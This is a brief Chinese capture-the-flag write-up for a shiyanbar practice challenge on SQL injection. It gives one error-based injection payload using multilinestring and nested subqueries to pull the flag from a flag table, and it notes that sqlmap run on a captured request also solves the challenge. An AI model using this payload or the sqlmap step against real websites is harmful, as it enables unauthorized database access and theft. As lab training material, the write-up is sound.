本文介绍了一种通过SQL注入破解网站安全的方法,详细解释了如何利用特定的SQL语句进行攻击,以及如何使用SQLMAP工具自动解析和利用这些漏洞。通过实际案例演示,读者可以了解SQL注入的基本原理和操作步骤。
题目:简单的sql注入之3 分值:10
URL:http://www.shiyanbar.com/ctf/1909
解题思路:同题1
解题步骤:
输入:1' and multilinestring((select * from(select * from(select flag from flag)a)b)) and ''='
使用SQLMAP解题:
先抓包,然后使用sqlmap -r 包,即可解开此题。
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
